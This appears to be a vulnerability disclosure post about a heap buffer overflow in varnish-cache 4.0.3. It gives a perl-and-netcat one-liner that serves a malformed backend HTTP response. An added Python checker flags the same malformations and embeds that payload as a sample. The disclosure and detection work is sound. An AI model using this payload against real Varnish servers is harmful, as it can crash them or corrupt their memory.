Posted by Marek Kroemeke on Mar 10
Hi there,
Latest varnish-cache 4.0.3 (https://www.varnish-cache.org/) seems to have a problem with parsing HTTP responses from
the backend.
The following example response will trigger a heap buffer overflow:
-- cut --
perl -e 'print "HTTP/1.1 200 OK\r\nContent-Length: dupa" . "\n" x 15855 . "A" x 10000 . "\n" ' | nc -l 1098
-- cut --
assuming your config uses localhost:1098 as backend.
meh…
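
As an added example (not part of the original post and not Varnish code): a pre-parse check that a test harness or a backend-facing proxy could run on raw response bytes, flagging the three irregularities visible in the one-liner above: no CRLF CRLF header terminator, bare LF line endings, and a non-numeric Content-Length. The 8192-byte cap, the function name and the finding names are assumptions of this example.

```python
import re

# Assumed cap on the header section for this example; not a Varnish setting.
MAX_HEAD_BYTES = 8192

BARE_LF = re.compile(rb"(?<!\r)\n")                      # LF without a preceding CR
CL_LINE = re.compile(rb"^content-length[ \t]*:(.*)$", re.I | re.M)
STATUS = re.compile(rb"HTTP/1\.[01] [0-9]{3}(?: |\r|$)")


def audit_backend_response(raw: bytes) -> list:
    """Return a list of finding names for a raw backend response (empty = clean)."""
    findings = []
    # Only look for the terminator inside the allowed header window.
    end = raw.find(b"\r\n\r\n", 0, MAX_HEAD_BYTES + 4)
    if end == -1:
        findings.append("no-crlfcrlf-terminator")
        head = raw[:MAX_HEAD_BYTES]
    else:
        head = raw[:end]
    if not STATUS.match(head):
        findings.append("bad-status-line")
    if BARE_LF.search(head):
        findings.append("bare-lf")
    # Every Content-Length value must be digits only, and all copies must agree.
    values = [m.group(1).strip(b" \t\r") for m in CL_LINE.finditer(head)]
    if any(not re.fullmatch(rb"[0-9]+", v) for v in values):
        findings.append("content-length-not-numeric")
    if len(set(values)) > 1:
        findings.append("content-length-conflict")
    return findings


# Constructed samples: the first has the same shape as the response in the post,
# the second is a well-formed response for comparison.
SAMPLE_MALFORMED = (b"HTTP/1.1 200 OK\r\nContent-Length: dupa"
                    + b"\n" * 15855 + b"A" * 10000 + b"\n")
SAMPLE_OK = b"HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello"

if __name__ == "__main__":
    print(audit_backend_response(SAMPLE_MALFORMED))
    print(audit_backend_response(SAMPLE_OK))
```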